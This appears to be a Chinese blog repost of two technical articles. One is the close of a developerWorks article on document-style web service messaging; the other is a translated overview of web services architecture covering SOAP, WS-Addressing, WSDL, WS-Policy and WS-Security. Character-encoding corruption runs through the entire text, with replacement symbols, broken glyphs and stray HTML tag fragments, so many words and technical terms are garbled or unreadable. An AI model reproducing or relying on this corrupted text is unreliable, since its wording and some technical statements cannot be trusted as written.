如果必须以特定的��序调用多个�q�程来维护应用程序状态，您应该考虑在您的服务中使用文��体系�l�构。如果需要多个过�E�调用，那么�q�程��׃��是无状态的�Q��ƈ且服务必��ȝ��护应用程序状态。在 Web 服务中维护状态可能是困难的；在远�E�过�E�调用的情况下，很少有客��L��q�_��会��生能够支持状态信息的存根代码。一个可能的解决�Ҏ��是��用文��体�pȝ��构，�q�在文��内部传送整个事务的内容。在�q�种情况下，服务��执行调用，以确保服务内部保持正��的��序�Q��ƈ且状态信息的�l�护不超出单个事务的范围。如果仍焉��要状态信息，可以��状态信息记录在最�l�得到的文档中，客户端应用程序也可以�l�护一个用于服务识别它的状态的令牌�?

使用文��样式来发布可供外部伙伴��用的服务
如果一个应用程序被发布到组�l�以外，发布者就很难控制谁正依赖于这个服务，以及如果做出��M��改动后果会怎样。在�q�种情况下，使用文��消息传递和支持�?ebXML �q�样的通用交换协议可能更加有利。通用交换协议正发展成能改善外部交换的��理�Q�因此新的��N易合作伙伴协定就可以快速地部��v。同��P��如果您的服务不需要请�?响应体系�l�构�Q�那么通用交换协议��可以更好地设计来处理认证、可靠消息交付以及异步请�?响应�?

使用文档样式来简化复杂文��的验证和��?/SPAN>
如果您的服务正��用字�W�串参数来传递或�q�回 XML 文��Q�或者它的参��C��一是一个具有复杂结构且需要自定义处理的对象，那么文��消息传递就可能是较好的选择。将参数的真实含义隐藏在字符串里�l�常会导致带有无效参数的有效调用。如果服务发布了 XML 文档模式�Q�那么在调用服务之前�Ҏ��q�个模式�q�行验证��׃��更加�Ҏ��。复杂结构经常用来传递组成完整事务的数百条信息。在处理复杂的结构时�Q�远�E�过�E�服务可能不得不处理自定义的�~�组代码�Q�同时应用程序仍然负责仔�l�地验证�l�构的每个元素。如果��用文档消息传递，那么应用�E�序�E�序员就可以使用 XML 模式来将验证下传到文档设计器�Q��ƈ且不需要自定义的编�l�代码�?

使用文��样式来最��化内存中的处理
在选择使用文��样式的消息传递还�?RPC 样式的消息传递时�Q�需要考虑的最后一个因素是需要处理的信息量大��。由于采�?RPC 样式的消息传递来�~�组参数的大部分�Q�如果不是全部的话）实现都是在内存中执行�q�项操作�Q�所以内存约束可能会使得 RPC 消息传递行不通。许多文��消息传递服务能够选择是用 DOM �q�是�?SAX 来处理文��，因而能够最��化内存中的处理。这对于 Web 服务��ؓ关键�Q�因为它可能需要处理成千上万的��h��Q�而且其中许多是同时发生的�?/P>
�l�束�?/SPAN>
在您设计下一�?Web 服务�Ӟ��您需要考虑当前�?WSDL 规范为您提供的所有选择。在开始创��E�性的接口之前�Q�考虑好将如何使用服务�Q�谁��用它�Q�以及需要交换的数据的类型和数量。设计开发文��样式的 Web 服务可能需要稍多一些的工作量，但是在很多情况下�Q�这些额外的工作量将会换取更高的信息质量和更可靠的交换性能�?/P>
参考资�?

您可以参阅本文在 developerWorks 全球站点上的英文原文.

Bilal Siddiqui 撰写的�?Deploying Web services with WSDL”（developerWorks�Q?001 �q?11 月）很好��C��l�了 Web 服务�?Web 服务描述语言�Q�Web Services Description Language�Q��?

参阅 WSDL�?SOAP 规范�?

XMethods 站点托管一个��用文��样式构建的 demo Web 服务�?

IBM �?WebSphere支持 Web 服务�?

参阅 IBM 最新的 Web Services initiative�?

关于作�?/SPAN>
James McCarthy �?Symmetry Solutions 公司的创始�h、总裁兼首席技术执行官�Q�他��定了公司的技术发展方向，�q�监督所有的��目和开发。在他二十年的��Y件开发生涯中�Q�James 一直在 Lotus Development Corporation、Deloitte、Haskins & Sells�Q�现在的 Deloitte & Touche�Q�以�?Aluminum Company of America�Q�ALCOA�Q�这样大公司中工作�ƈ担�Q领导职位。他�?University of Pittsburgh 获得信息�U�学��士学位�Q��ƈ�?Nichols College 获得信息�pȝ��与营销�?BS/BA。您可以通过 jmccarthy@symmetrysolutions.com联系�?James�?

�W�笨 2005-08-22 09:19 发表评论

Web服务架构及其规范入门

�W�笨 — Wed, 17 Aug 2005 12:40:00 GMT

http://www.54bk.com/blog.asp?subjectid=1715&name=yuexb

作者：Luis Felipe Cabrera、Christopher Kurt、Don Box

    [摘要]本Web服务架构入门阐述了Web服务架构的基��设计原则和Web服务的基��技术。此外还对其功能�q�行了介�l�，�q�提供了对其�q�行正式定义的规范链接。本文也是该架构所有规范的参考指南�?/P>
XML和Infoset

    对于所有的消息传递系�l�来��_��选择信息传输单位是非帔R��要的——简单地��_��Ҏ��息的构成有个一般的认识是必不可��的。在Web服务中，一条消息就是一个XML文��信息��，它由XML信息集（XML Information Set�Q�即Infoset�Q�定义。Infoset是一个抽象的数据模型�Q�它兼容��Z��文本的XML 1.0�Q�也是所有最新XML规范�Q�XML Schema、XML Query和XSLT 2.0�Q�的基础。由于Web服务架构是以XML Infoset�Q�而不是某一特定的表现�Ş式�ؓ基础�Q��得该架构及其核心协议�l��g可与其他�~�码技术兼宏V�?/P>
    Infoset�Ҏ��一�l�‘信息项�Q�Information Items�Q�’对XML文档�q�行建模。这�l�可能的信息��一般会映射到XML文��的不同功能部件上�Q�如元素、属性、命名空间和注解。每一信息��w��有一个关联属性集�Q�用于提供该��的更完整描�q�。附录B描述了XML文档中的11�c�M��息项。每一个结构严谨的XML文��都会包含一个文��信息项和至��一个元素信息项�?/P>
    除了��Z��U�文本的Infoset�~�码技术以外，Web服务架构�q�支持另外一�U�Infoset�~�码技术——即允许不透明的二�q�制数据与传�l�的��Z��文本的标��C��l�在一赗��W3C XML-binary Optimized Packaging�Q�即XOP�Q�格式��用多部分MIME��原始二�q�制数据引入到XML 1.0文��中，而不采用base64�~�码。其配套规范——SOAP 消息 Transmission Optimization Method�Q�即MTOM�Q�则指定如何��该格式�l�定到SOAP。XOP和MTOM是将原始二进制数据与��Z��文本的XML混合在一��L��首选方法，它们取代了目前普遍遭到反对的SOAP with Attachments�Q�SwA�Q�和WS-Attachments/DIME�?/P>
SOAP

    SOAP为在分散的分布式环境中��用XML在同�{�体之间交换�l�构化分�c�M��息提供了一�U�简单的轻量�U�机制。SOAP旨在最大限度地降低对基于不同��^台构建的应用�E�序�q�行集成的设计成本，�q�认为最低成本技术最有可能赢得普遍接受。SOAP消息是包含三个元素的XML文档信息��，�q�三个元素是�Q?lt;Envelope>�?lt;Header>�?lt;Body>�?/P>
    Envelope是SOAP消息的根元素�Q�它包含一个可选的Header元素和一个必需的Body元素。Header元素是以分散方式增加SOAP消息功能的一�U�通用手法。Header的每个子元素都被�U�Cؓ一个Header块（Header Block�Q�，SOAP定义了几个知名的属性来指示应该��p��来处理Header块（role�Q�以及这�U�处理是可选的�q�是必需的（mustUnderstand�Q�，下文中对�q�两个属性进行了介绍。目前，Header元素��L��Envelope的第一个子元素�Q�Body元素��L��Envelope的最后一个子元素�Q�也是供最�l�消息接收者��用的“有效负载”的容器。SOAP本��n没有定义内置的Header块，且只定义了一个有效负载，那就是用于报告错误的Fault元素�?/P>
    所有的Web服务消息都是SOAP消息�Q�它们充分利用了XML Infoset。消息有效负载和协议头都使用同一个模型，可以��保基础架构头Header和应用程序体的完整性。应用程序发送消息时可能会同时考虑Header的内容和消息中的数据。�ؓXML数据模型开发的工具可以用于��查和构徏完整的消息。过去，�q�些益处在某些架构中是没有的�Q�如DCOM、CORBA和RMI�Q�它们之中的协议头是一些对应用�E�序不透明的基��架构�l�节�?/P>
    SOAP消息是从发送者向接收者单向传送的。多个单向消息的�l�合可以形成较�ؓ复杂的模式。例如，比较常见的模式是同步��h��/响应消息寏V��发送或接收消息的�Q何一个��Y件代理都被称��Z��个SOAP节点�Q�SOAP Node�Q�。启动消息传输的节点�U�Cؓ原始发送节炏V��用和处理消息的最后一个节点称为最�l�接收节炏V��在原始发送节点和最�l�接收节点之间处理消息的��M��节点都叫做中介（Intermediary�Q�。中介用于模拟单个消息的分布式处理。消息经�q�的所有中介节点和最�l�接收节点统�U�Cؓ消息路径�Q�Message Path.�Q��?/P>
    ��Z��能够识别消息路径的各个部分，每个节点都担��M��个或多个角色。SOAP角色是一�U�分�c�L��式，它将一个基于URI的名�U�C��某些抽象功能�Q�如�~�存、验证、授权）兌��在一赗��基��SOAP规范定义�?个内�|�角�Ԍ��Next和UltimateReceiver。Next是一个通用角色�Q�因为除了发送节点之外的每一个SOAP节点都属于Next角色。UltimateReceiver是消息�\径中�l�端节点所扮演的角艌Ӏ�它通常��是应用�E�序�Q�或在某些情况下是代表该应用�E�序执行��d��的基��架构�?/P>
    SOAP envelope的Body��L��针对最�l�接收节炏V��而SOAP header则可以针对中介，也可以针�Ҏ��l�接收节炏V��ؓ了提供一个安全且版本可控的消息处理模型，SOAP定义�?个属性，用于控制中介和最�l�接收节点处理某一指定Header块的方式——role、relay和mustUnderstand。角色属性用于确定Header块所针对的节炏V��mustUnderstand属性用于指�C�在Header块未被认出的情况下该节点是否可以忽略该Header块。带有mustUnderstand="true"标记的Header块叫做强制Header块（Mandatory Header Block�Q�。标��CؓmustUnderstand="false"或没有mustUnderstand属性的Header块叫做可选Header块。relay属性指�C��节点是发送还是放弃未被认出的可选header�?/P>
    每一个SOAP节点都必��M��用这3个属性来实现SOAP处理模型。以下步骤详�l�说明了该模型：

使用角色属性（�~�省该属性表�C�Header块针�Ҏ��l�接收节点）��定��用于当前SOAP节点的SOAP消息的所有Header块�?
验证当前SOAP节点是否能够使用SOAPmustUnderstand属性来处理步骤1中所��定的所有强制Header块。如果有强制Header块不能被当前SOAP节点处理�Q�则必须丢弃该消息，�q�生成一条醒目的错误消息�?
处理消息。可以忽略可选消息元素�?
如果SOAP节点不是消息的最�l�接收节点，则步�?中所��定的所有无法分�E�传送的Header块都会被删除�Q�然后消息被传送到消息路径中的下一个SOAP节点。下一个SOAP节点可以自由地将新的Header块插入到分程传送的消息中。其中的某些Header块可能是步骤1中所��定的Header块的副本�?

    SOAP处理模型旨在实现可扩展性和版本控制。mustUnderstand属性对新Header块的引入是中断变化还是非中断变化�q�行控制。添加可选header块（如标��CؓmustUnderstand="false"的header�Q�是一�U�非中断变化�Q�因��Z�Q何SOAP节点都可自由忽略它。添加强制header块（如标��CؓmustUnderstand="true"的header�Q�是一�U�中断变化，因�ؓ只有知晓Header块语法和语义的SOAP节点才能够处理SOAP消息。Role、relay以及mustUnderstand属性沿着消息路径传递这�U�处理模型�?/P>
消息交换模式

    SOAP所提供的消息传递灵�z�L��Web服务能够以多�U�消息交换模式进行通信�Q�从而满��_��布式应用的需求。我们在该架构的核心构�g中充分利用了其中一些模式，有几�U�模式已�l�被证明在分布式�pȝ��中特别有用，比如使用�q�程�q�程调用��׃��同步��h��/响应消息交换模式得到了普及。当消息传送潜伏时间失控时�Q�就需要采用异步消息传递。当使用同步��h��/响应模式�Ӟ��昑ּ�消息相关性则成�ؓ必需�?/P>
    �q�播传输�Q�Broadcast Transport�Q��一对多消息传输得到了普及。原始发送者将其消息强行发送给接收者的模式�U�Cؓ推模式（Push Model�Q�。尽��这�U�模式在局域网里很有效�Q�但在广域网中则不太适用�Q�接收者也无法调控消息��。另一个有用的模式是以应用�E�序表达�Ҏ��些特定消息类别的兴趣的能力�ؓ基础的，它��发布/订阅模式大行光��。通过昑ּ�订阅消息源（或主题）�Q�应用程序可以更好地控制相关信息��。接收者从消息源显式请求消息时使用拉模式（Pull Model�Q�。在�q�种模式下，消息��是由接收者驱动的。拉模式也可以与发布/订阅模式�l�合使用。这非常适合于接收者可能要与消息源间歇地断开�q�接的情��c�?/P>
传输的独立�?/H2>
    �Ҏ��SOAP的定义，它与所使用的底层消息传递机制无兟뀂它支持很多可用的消息交换传输机�Ӟ��也支持同步和异步消息传送与处理。既需要多�U�传输又需要异步消息传递的�pȝ��的一个例子是在基于陆地高速网�l�干�U�的Web服务与由�U�d��电话托管的间歇连接的Web服务之间�q�行通信的系�l�。这��L��pȝ��要求一条消息经哪种传输�pȝ��传输要以该消息在哪个�|�段内移动�ؓ依据。这��L��pȝ��q�有一个典型特点，��x��息传送潜伏时间无法精��确定。Web服务开发�h员不应力囄��定或界定消息传送潜伏时��_��而应在假定异步消息传递已辑ֈ�最大效能的前提下构建系�l�。与使用�q�程�q�程调用时的情况不同�Q�异步消息传递允许发送者在每一消息传输之后�l�箋�q�行处理�Q�而不必被�q�阻塞�ƈ�{�待响应。当�Ӟ��同步��h��--响应模式也可以构建在异步消息传递的基础之上�?/P>
    既然Web服务协议完全独立于底层传输之外，适当机制的选择可能��p��延迟到运行时。这��׃ؓWeb服务应用�E�序提供了在发送消息时��定相应传输机制的灵�z�L��。此外，底层传输机制可能会随着消息在节点之间的发送而变化，相应圎ͼ�针对每一�|�段而选择的传输机制也会随需发生变化�?/P>
    ��管存在着�q�种一般的传输的独立性，大多数第一代Web服务都��用HTTP来进行通信�Q�因��是SOAP规范内所包含的一�U�主要绑定协议。HTTP以TCP作�ؓ其底层传输协议。但是，TCP在设计时引入了不必要的处理开销。有些应用协议模式与用户数据报协议（即UDP�Q?User Datagram Protocol�Q�的语义学比较匹配，�q�些模式对于受设备及其他资源�U�束的系�l�特别有用。UDP不像TCP那样��h��传输保证�Q�它提供最大限度的数据报消息传递。与TCP相比�Q�它需要的实施资源较少。此外，UDP�q�提供了多�\�q�播功能�Q�Multi-cast Capabilitiy�Q�，使一个发送者可以将消息同时发送给多个接收者�?/P>
��d��

    对于要在�q�种多传输情况下发送和��d��的消息来��_��要让关键的消息传递属性�ؓ多个传输所携带�Q�就需要一�U�共用机制。�ؓ此，WS-Addressing规范定义�?�l�SOAP Header块：

Action Header块用于说明消息的预期处理。该Header块包含一个URI�Q�最�l�接收者通常用它来分�z�要�q�行处理的消息�?
MessageID和RelatesTo Header块用于识别和兌��消息。MessageID和RelatesTo header使用��单的URI来唯一地识别消息——这些URI通常都是瞬态的UUID�?
To/ReplyTo/FaultTo Header块用于识别要处理消息及其回复的代理。这些Header依赖于WS-Addressing所定义的称为“端点引用（Endpoint Reference�Q�”的�l�构�Q�它��与对SOAP消息�q�行正确��d��所需的信息捆�l�在一赗��?

    端点引用是WS-Addressing的最重要的方面，因�ؓ与仅使用URI相比�Q�它们可为更�l�粒度的��d��提供支持。它们广泛用于整个Web服务架构。端点引用包�?条关键的信息�Q�基地址、可选的引用属性集和引用参数。基地址是一个URI�Q�用于识别端点，出现在指向该端点的每一SOAP消息中的To Header块中。引用属性和引用参数是用于�ؓ该消息提供附加发送或处理信息以补充基地址的�Q意XML元素的集合，它们以文字Header元素来表�C�。当使用端点引用来构建端�Ҏ��息时�Q�发送者负责提供作为Header块的所有引用属性和引用参数�?/P>
    引用属性和引用参数之间的区别在于它们如何关联服务元数据。Web服务�{�略和契�U�仅��Z��其基地址和引用属性。通常�Q�基地址和引用属性用于识别某一�l�定的已部��v服务�Q�引用参数用于识别该服务所��理的特定资源�?/P>
    引用属性和参数是那些预期只被最�l�接收者处理的��单的不透明XML元素。它们有助于��保可用于分�z�、发送、烦引或其他发送端处理�z�d��的信息被包含在给定的消息中。尽��中介预期不会对该信息进行处理，但某些中介（如防火墙或网��x��务程序）却有可能使用某些引用属性或参数来进行消息发送、消息处理。引用属性有很多用途。服务类�Q�Classes of Service�Q�和专用实体标识�W�（Private Entity Identifier�Q�就是两个例子。在服务�{��例子中，引用属性可以用于区分针�Ҏ��准客��L��Web服务和针对“黄金”客��L��Web服务�Q�后者提供了更高的服务质量和增强功能——可能是通过附加的操作或附加的绑定——在逻辑上�Ş成两个不同的端点。这些属性只在一个会话中讄��一�ơ，然后便在交互的其余所有部分重复��用。引用属性另一个用途的例子是以一�U�对�pȝ��不公开发送消息的方式来识别客��L��机制。这两种引用属性的�l�合可以高效地将消息发送给一�l�适当的服务器�Q��ƈ高效地确定与某一特定用户有关的应用状态。这些例子还展示了引用服务实例的数据和引用用户实例的数据如何用引用属性来表示�?/P>
    需要特别指出的是，引用属性还有助于对�׃�n一个共同的URL和作用域的WSDL实体集合�q�行��d��。WSDL是将Web服务描述为操作消息的一�l�端点的XML格式�Q�它首先抽象地指定其实体�Q�然后将其具体地�l�定到特定实例。具体而言�Q�消息和操作�l�抽象定义之后，被绑定到带有�|�络传输和消息格式信息的一个端炏V��因此，从WSDL的角度来看，当针对不同的具体实体�Q�如输入或输出消息、portType�l�定、端口或Web服务中��用一个共同URL的服务）�Ӟ��对应端点引用的引用属性应该不同�?/P>
    使用引用参数的两个例子是基础架构和应用水�q�뀂引用参数的基础架构例子可以是发送给某一事务处理监视器的事务/征募ID�Q�Enlistment ID�Q�。在一个购书的场景中，书的ISBN号可能就是一个引用参数应用水�q�例子�?/P>
元数据（Metadata�Q?/H2>
    所有的Web服务交互都是通过交换SOAP消息来进行的。�ؓ了提供一个健壮的开发和操作环境�Q�服务是用机器可�ȝ��元数据来描述的——元数据支持互操作性。Web服务元数据可以服务于若干个意图。它用于描述Web服务支持的消息互换格式和某一服务有效的消息交换模式。元数据�q�用于描�q�服务的功能和需求。元数据的最后一�U��Ş式叫做“服务策略（Policy of Services.�Q�”。消息互换格式和消息交换模式用WSDL来表�C�，�{�略使用WS-Policy来表�C�，契约�Q�Contract�Q�用上述三种元数据来表示。契�U�是��应用程序与它们所依赖的服务的内部实现�l�节隔离开来的抽象�?/P>
    Web服务描述语言�Q�即WSDL——Web Service Description Language�Q�它是被�q�泛用于描述Web服务基本特征的第一�U�手�D�c��用WSDL描述的消息被归�ƈ为定义基本消息模式的若干操作。这些操作被归�ƈ为称作端口的若干个接口，它们详细说明了抽象的服务契约。端口和�l�定则用于将portTypes与具体传输和physical 部��v信息兌��在一赗��WSDL描述是自动识别目标服务的所有特征和启用软�g开发工��L��W�一步。WSDL指定��h��消息必须包含什么以及响应消息在使用无歧义符��h��的显�C�Z��是怎样。WSDL文�g用于描述消息格式的符��h��Z��XML模式的。这意味着它既是编�E�语�a�中立的又是基于标准的�Q�这使得它很适合于描�q�可通过多种�q�_��和编�E�语�a�来访问的服务接口。除了描�q�消息内容以外，WSDL�q�可以定义服务在何处是可用的�Q�以及哪些通信协议被用于与该服务交谈。这意味着WSDL文�g可以指定用于�~�写与某一Web服务�q�行交互的程序的基本元素。有几种工具可用于读取WSDL文�g�Q�以及�ؓ�~�制句法正确的Web服务消息生成所需代码�?/P>
    ��管WSDL是一个不错的��L��Q�但它�ƈ不��以描�q�Web服务的方斚w��面，WSDL只能表示较少的一�l�属性。Web服务所必需的更详细信息包括�Q?/P>

操作特征�Q�支持SOAP 1.2�?
使用特征�Q�仅在早9点和下午5点之间可用�?
安全特征�Q�要讉K��该服务必需使用Kerberos��?

    �W�一代Web服务必须使用专有协议来交换带外（Out of Band�Q�的元数据，�q�一问题可以使用WS-Policy来解冟뀂WS-Policy提供了一�U�通用模型和语法来描述和传达Web服务�{�略。它指定了一个概念基集，它可以被其他Web服务规范使用和扩展，以描�q�更为广泛的服务需求和功能。WS-Policy引入了一个简单的可扩展语法来表示�{�略断言�Q�Policy Assertion�Q�，以及一个处理模型来解释它们。断�a�可以合�ƈ到逻辑选项中�?/P>
    �{�略断言使编�E��h员要么在开发时、要么在�q�行时向服务信息中添加适当的元数据。开发时�{�略的例子包括消息大��的最大允许值或所支持规范的确切版本，�q�行时策略的例子包括宕机时的必备服务或某一�l�定的管理过�E�（定期的硬件维护）期间Web服务的不可用性。可以对单个的策略断�a��q�行分组�Q�以形成�{�略选项�Q�Policy Alternative�Q�。策略是�{�略选项的集合。�ؓ了便于进行互操作�Q�策略是�Ҏ��其XML Infoset表示形式来定义的。�ؓ了在保持互操作性的同时减小�{�略文��的大��，又定义了�{�略的紧凑�Ş式�?/P>
    �{�略用于传达两个Web服务端点之间的交互条件。满��策略中的断�a�通常会引发反映这些条件的行�ؓ。因此，�{�略断言评估是识别兼容行为的中心。当且仅当请求者满��求，��x��供了�q�一功能、与该断�a�相符�Ӟ��h��者才支持�{�略断言——策略的构造块。一般而言�Q�这�U�决定要使用特定领域的知识来做出。请求者支持策略选项的条件是当且仅当��h��者支持选项中的所有断�a��Ӟ��q�种军_��是��用策略断�a�的结果机械性地做出的。同��P��当且仅当��h��者至��支持策略中的一个选项�Ӟ��h��者才支持�{�略。一旦策略选项�l�过评估�Q�该军_��也是机械性地做出的。请注意�Q�虽然策略选项是互斥的�Q�但一般来说要��定多个选项是否可以同时得到支持也是不太可能的�?/P>
    ��Z��以互操作的�Ş式传辄��略，�{�略表达式（Policy Expression�Q�采用策略的某种XML Infoset表示形式。普通�Ş式的�{�略表达式是最��单的Infoset�Q�同��P��可选的Infoset允许通过大量构造来��z�地表达�{�略。策略表辑ּ�是策略的基础构造块。有两个�q�算�W�用于表达断�a��Q�All和ExactlyOne。All�q�算�W�表�C�策略选项集中的所有断�a�都必��适用于要满��的策略断�a�。ExactlyOne�q�算�W�表�C�策略选项集中只有一条断�a�必须适用于要满��的策略断�a��?/P>
    �{�略层位于WSDL描述之上�Q��ƈ对它�q�行了扩充。策略与Web服务元数据（如WSDL定义或UDDI实体�Q�的兌��是通过使用WS-PolicyAttachment来实现的。策略可以作为其定义所固有的一部分或独立地与资源关联在一赗��机制就是针对这些不同目的而定义的。需要特别指出的是，�{�略也可以与单个的SOAP消息一起��用。如果�ؓ某一实体制作了多个策略附�Ӟ��它们会共同确定该实体的有效策略（Effective Policy�Q�。在WSDL层次�l�构的不同层�ơ上选用�{�略时一定要��心�Q�因为层�ơ结构每一层次的最�l�结果就是一个有效策略。作��我描�q�和人所能理解的明确性的一般规则，在策略断�a�所适用的层�ơ结构的每一层次上详�l�地重复该策略断�a��Q�比��单地依赖于计��有效策略的机制更可取。在一个WSDL文��中，与部�|�端点的消息交换可以同时包含所�?�c�M��题的有效�{�略。WS-Policy和WS-PolicyAttachment相结合可以提高应用程序来发现和推出其他服务所支持的策略的能力。添加策略的灉|��性是�Ҏ��q�消息交互的WSDL信息的一个重要补充�?/P>
    WSDL和WS-Policy都定义了元数据格式，但都没指定某一�l�定服务获得或访问元数据的机制。一般来��_��服务元数据可以通过使用许多�Ҏ��来获取。�ؓ了支持服务的自我描述�Q�Web服务架构在WS-MetadataExchange中定义了��Z��SOAP的元数据讉K��协议。GetMetadata操作用于��索在��h��的端点引用中扑ֈ�的元数据。Get操作�c�M��Q�但用于��索不同的元数据：在元数据部分引用�Q��ƈ要在存储它的端点引用中检索的元数据�?/P>
    使用WS-MEX来交换的元数据可以描�q�Cؓ资源。资源即可由某一端点引用��d��的�Q何实体，�q�且在该端点引用中，该实体可以提供一�U�其自��n的XML表示形式。资源构成了构徏Web服务中的状态管理所需的基��?/P>
什么是互操作性概要（Interoperability Profile�Q?BR>    概要�Q�Profile�Q�是一�l�指导原则，主要针对于核心协议以及Web服务规范的��用。这些指导原则对于规范的通用设计来说是必需的。在某些情况下，开发�h员需要额外的帮助来确定��用哪些Web服务�Ҏ��来满��某一特定需求。互操作性概要还用于解决Web服务规范不够明确的领域中的含�p�性问题，以确保所有实施都以相同的方式来处理SOAP消息�?/P>
WS-I基本概要
�W�一个Web服务概要是由Web服务-互操作性组�l�（WS-I�Q�Web Services-Interoperability Organization�Q�发布的。WS-I已经完成了其�W�一个概要，�q�简单地�U�Cؓ基本概要1.0。该概要主要��Z��SOAP1.1和WSDL 1.0的互操作使用来提供指导原则�?/P>
安全�?/H1>
    本节介绍Web服务架构中用于提供某一�pȝ��内部的消息完整性、��n份验证和机密性、安全性��o牌交换、消息会话安全性、安全策略表�C�和服务联盟安全性的规范。提供这些特性的规范是WS-Security、WS-Trust、WS-SecureConversation、WS-SecurityPolicy和WS-Federation�?/P>
    安全性是计算机系�l�的一个基本方面，��其是那些由Web服务�l�成的系�l�。安全性必��L��健壮而有效的。因为系�l�只�Ҏ��息格式和合法的消息交换作出硬件假设，因此安全性必��d��于一致通过的明��机制和假设。安全基��架构�q�应该具有��够的灉|��性，以支持不同组�l�所需的不同安全策略�?/P>
    当安全传输可用于通信Web服务�Q�如安全套接层（SSL�Q�和传输层安全性（TLS�Q�之间时�Q�构建安全性解��x��案就得到了简化。有了安全传输，�q�些服务��׃��需要参与单个消息的完整性和机密性的�l�护�Q�它们可以依赖于底层传输。不�q�，现有的传输��安全性是一个仅限于点对�Ҏ��息传递的解决�Ҏ��。如果在使用安全传输时存在中介，则最初发送者和最�l�接收者需要相信这些中介能够帮助提供端到端的安全性，因�ؓ每个�|�段都是安全的。除了要明确��C��L��有中介外�Q�还必须考虑到其他风险，如消息的本地存储和中介受到损害的可能性�?/P>
    ��Z��最大限度地扩大Web服务的作用范��_��当通信端点不相信中介时�Q�必��L��供端到端的安全性，那就需要更高��别的安全协议。作为另一�U�选择�Q�端到端消息安全性比点对点传输��安全性具有更丰富的内涵，因�ؓ它支持Web服务所需的基于SOAP的松耦合、联合、多传输和可扩展环境。这�U�功能强大而又灉|��的基��架构可以通过现有技术和Web服务协议的组合来开发，同时�q�可以缓解与点对�Ҏ��息传递相兌��的许多安全风险�?/P>
    ��管Web服务的安全需求很复杂�Q�但��Z��q�没有发明新的安全机制来满��Z��SOAP的消息传递的需要。现有的分布式系�l�安全性方法，如Kerberos��、公钥加密技术、X.509证书�{�已�l�够用了。只有应用现有的SOAP安全�Ҏ��Ӟ��新机制才是必需的。这些新安全协议的设计充分考虑了可扩展性，以便��来能够加入新的�Ҏ��。一个主要的设计目标是要提供自我描述安全性属性（为包括SOAP在内的Web服务架构而设计）机制�?/P>
    Web服务安全性的基础是输入消息要证实一�l�关于发送者、服务或其他资源的断�a��q�一需求。我们称之�ؓ断言或安全性断�a�。典型的安全性断�a�包括�w�䆾、属性、关键胦产、权限或功能。这些断�a�是用包裹在XML中的二进制安全性��o牌编码的。在传统的安全性术语中�Q�这些安全性��o牌表�C�功能和讉K��控制的�؜合。很多方法都被用于创建安全性��o牌。Web服务可以从本��C��息构建定制的安全性��o牌。反�q�来�Q�安全性��o牌也可以从X.509认证机构或Kerberos域控制器�{�专业服务检索。�ؓ了实现服务之间的通信自动化，需要一个表辑֮�全需求的�Ҏ��?/P>
    服务可以使用WS-SecurityPolicy中所指定的策略断�a�来表辑օ�安全需求。通过��索这些策略断�a��Q�应用程序可以构建符合目标服务需求的消息。断�a�、安全性��o牌和�{�略所提供的这�l�特性以及从Web服务��索它们的能力非常强大。这�U�普通的Web服务安全模式支持一些更具体的安全模式，如基于��n份的授权、访问控制列表和��Z��功能的授权。它允许使用现有技术，如X.509 公钥证书、基于XML的��o牌、Kerberos�׃�n的秘密票和密码摘要。这�U�普通模型对于构��Z��用更复杂的方法来�q�行更高�U�别的密钥交换、��n份验证、基于策略的讉K��控制、审核和处理复杂的信��d��pȝ��pȝ��已经��_��。也可以使用代理和中�l�服务。例如，可以构徏中��服务来加��Z��于信任边界的安全�{�略�Q�出界的消息被加密，而界内的消息不加密。以前的解决�Ҏ��没有提供�q�种灉|��性和完善�E�度。附录C中所描述的常见安全攻��d��含了�pȝ��威胁的基本分�c�，而这些系�l�威胁是在选择Web服务安全�Ҏ��时应认真加以考虑的�?/P>
    本节的余下部分将探讨Web服务安全模式的应用。两个重要主题是安全通信和安全应用。没有假定安全的消息传输�Q�这也不是安全的Web服务所必需的�?/P>
消息完整性和机密�?/H2>
    消息�U�安全性是端到端安全性的关键构造块。��用消息��安全性时�Q�无需传输�U�安全性。对消息�U�安全性的要求是消息完整性、消息��n份验证和机密性。消息完整性确保消息不能在不知不觉中被更改。��用XMLSignature可确保消息的修改能够被察觉。消息��n份验证可识别发送消息的��M��。如果��用了公钥加密�Q�就可以��定��M��的唯一�w�䆾。将公钥加密与经受信��L��认证的密钥一起��用可以实现这�U��n份验证。不�q�，如果使用了对�U�密钥加密，情况��׃��一样了——只有知道共享密钥的��M��才能被识别。消息机密性可��保在传输期间未�l�授权的�W�三方不能阅��L��息。SOAP消息是通过使用XMLEncryption [XMLENC]和安全性��o牌来保证机密性的�?/P>
    完整性、��n份验证和机密性机制将初始消息�Q�或该消息的某些部分�Q�作��入，��生成的数据�Q�如校验和）作�ؓ输出。例如，在某�U�简单情况下�Q�XML元素的签名可能会作�ؓXML元素所有字�W�的散列的非对称加密来实现。然后该加密散列可以存储在该消息中，�q�在该消息中传送。可以将XML文��看作字符丌Ӏ�就像XML�{�֐�一��P��逐字�W�地比较也是非常重要的安全性操作。一字之差会��D��不同的结果。串行化是用于表�C�“在�U�쀝对象的�Ҏ��。例如，串行化可用于创徏SOAP消息的XML表示。不同串行化软�g所��D��的�Q何无关紧要的排字差异都会被消息处理��Y件忽略，但会对安全性��Y件��生很大媄响。XML消息的Infoset表示形式改进了这一问题。要使XML�{�֐�生效�Q�消息必��{换成一个对所有方都是一致的XML表单。规范化是一个术语，来描�q�用于生成一致的换行�W�、制表间隔、属性排序和�l�束标签样式�{�非关键信息视图的方法。签名包含了用于使消息接收者能够完全像发送者那样处理安全信息的规范化方法。某一服务所使用的特定的规范化方法是要放�|�在一个WSDL portType�l�定或WSDL端口的有用的�{�略断言�?/P>
    WS-Security指定了消息完整性和机密性机制以及单一的消息��n份验证。对于消息完整性，该规范详�l�描�q�C��加密�{�֐�是如何表�C��ƈ与SOAP消息的特定部分关联的。该�Ҏ��允许��L��格式良好的消息片�D�|��有单独的�{�֐�。与之类��|��机密性是通过�l�构良好的消息片�D늚�加密来实现。��n份验证是使用数字�{�֐�来实现的。WS-Security规范描述了当前常用的安全机制�Q�也没有排除��来��d��新机制的可能性。因为SOAP处理模型使用Header元素来作出处理决定，所以是军_��SOAP消息中的哪些元素需要加密时一定要多加��心�?/P>
